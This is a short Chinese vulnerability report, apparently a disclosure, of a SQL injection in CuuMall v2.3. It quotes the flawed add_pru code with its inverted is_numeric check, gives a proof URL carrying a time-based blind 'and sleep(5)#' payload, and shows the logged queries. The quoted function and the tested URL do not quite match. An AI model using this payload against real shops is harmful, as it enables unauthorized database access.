CuuMall 最新版本sql注入一枚
### 简要描述: CuuMall 最新版本sql注入一枚 ### 详细说明: 感觉 CuuMall 的官网文件是不是被人改动了 还是本身就是个bug,不多说了 直接看代码 DetailsAction.class.php(282-313) ``` public function add_pru( ) { $coo = new Cookie( ); if ( $coo->is_set( c( "GUESTCOOK" )."mall-m-name" ) ) { $this->assign( "waitSceond", 3 ); $this->assign( "jumpUrl", "__APP__/Home/login" ); $this->error( "请登录后收藏商品" ); exit( ); } $id = $_GET['id']; if ( is_numeric( $id ) ) { $this->assign( "waitSceond", 3 ); $this->assign( "jumpUrl", "__APP__" ); $this->error( "非法参数" ); exit( ); } $addpru = new Model( "m_add" ); $d_addpru = $addpru->where( "pruid=".$id )->find( ); if ( empty( $d_addpru ) ) { ``` 这里 居然判断为是一个数字类型那么就非法参数,按照正常逻辑这里应该是非数字啊 结果导致 $d_addpru = $addpru->where( "pruid=".$id )->find( );盲注了 访问url: 192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/detail/index/id/2 and sleep(5)# 延时响应即可!!! 查看后台抓的数据库sql 2014/9/30 10:37SELECT * FROM `cuu_sell_id` WHERE pro_id=1 and sleep(5) 2014/9/30 10:37SELECT * FROM `cuu_pl_id` WHERE pro_id=1 and sleep(5)...
